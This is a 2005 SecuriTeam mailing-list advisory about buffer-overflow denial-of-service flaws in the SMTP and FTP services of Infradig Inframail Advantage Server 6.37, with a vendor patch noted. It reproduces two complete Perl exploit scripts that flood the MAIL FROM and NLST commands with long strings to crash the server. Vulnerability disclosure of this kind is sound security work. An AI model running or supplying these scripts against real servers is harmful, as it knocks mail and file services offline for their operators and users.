[NEWS] Infradig Systems Inframail Advantage Server Multiple DoS

From: SecuriTeam (support_at_securiteam.com)
Date: 06/30/05

  • Next message: SecuriTeam: "[EXPL] PHP-Fusion Accessible Database Backups Download (Exploit)"
    To: list@securiteam.com
    Date: 30 Jun 2005 15:21:35 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Infradig Systems Inframail Advantage Server Multiple DoS
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.infradig.com/> Infradig servers are "servers that support
    SMTP, POP, IMAP, NNTP (NEWS), FTP, HTTP, WEBMAIL, WEBDAV, WAPMAIL, SIP,
    mailing-lists, calendars and document sharing".

    Lack of proper command filtering allows attackers to send a long string as
    a command which in turn will cause a buffer overflow that will in turn
    crash the Infradig server.

    DETAILS

    Vulnerable Systems:
     * Infradig Systems Advantage Server Edition version 6.37

    Immune Systems:
     * Infradig Systems Advantage Server Edition version 7.2

    The commands SMTP MAIL FROM: and FTP NLST vulnerable for buffer overflow.
    Issuing the character 'A' 40960 times as an argument to MAIL FROM: command
    will cause the ifmail.exe process to die and re-launch.

    Issuing the character 'A' roughly 102400 times to the NLST command and
    then issuing the character 'A' roughly 102400 times to the NLST command
    again will cause all processes running under the ifmailsvc.exe process to
    die and re-launch (these processes include slapd.exe, slurpd.exe,
    ifmail.exe, ifweb.exe and otheres).

    Vendor Status:
    The vendor has released a patch for Infradig Systems Advantage Server
    Edition.

    Exploit:
    Inframail_SMTPOverflow.pl
    #===== Start Inframail_SMTPOverflow.pl =====
    #
    # Usage: Inframail_SMTPOverflow.pl <ip>
    # Inframail_SMTPOverflow.pl 127.0.0.1
    #
    # Infradig Systems Inframail Advantage Server Edition 6.0
    # (Version: 6.37)
    #
    # Download:
    # http://www.infradig.com/
    #
    ##############################

    use IO::Socket;
    use strict;

    my($socket) = "";

    if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                        PeerPort => "25",
                                        Proto => "TCP"))
    {
            print "Attempting to kill Inframail SMTP server at
    $ARGV[0]:25...";

            sleep(1);

            print $socket "HELO moto.com\r\n";

            sleep(1);

            print $socket "MAIL FROM:" . "A" x 40960 . "\r\n";

            close($socket);
    }
    else
    {
            print "Cannot connect to $ARGV[0]:25\n";
    }

    # EOF

    Inframail_FTPOverflow.pl
    #
    # Usage: Inframail_FTPOverflow.pl <ip>
    # Inframail_FTPOverflow.pl 127.0.0.1
    #
    # Infradig Systems Inframail Advantage Server Edition 6.0
    # (Version: 6.37)
    #
    # Download:
    # http://www.infradig.com/
    #
    ##############################

    use IO::Socket;
    use strict;

    my($socket) = "";

    if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                        PeerPort => "21",
                                        Proto => "TCP"))
    {
            print "Attempting to kill Inframail FTP server at $ARGV[0]:21...";

            sleep(1);

            print $socket "USER hello\r\n";

            sleep(1);

            print $socket "PASS moto\r\n";

            sleep(1);

            print $socket "NLST " . "A" x 102400 . "\r\n";

            sleep(1);

            print $socket "NLST " . "A" x 102400 . "\r\n";

            close($socket);
    }
    else
    {
            print "Cannot connect to $ARGV[0]:21\n";
    }

    #EOF

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:reedarvin@gmail.com> Reed
    Arvin.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[EXPL] PHP-Fusion Accessible Database Backups Download (Exploit)"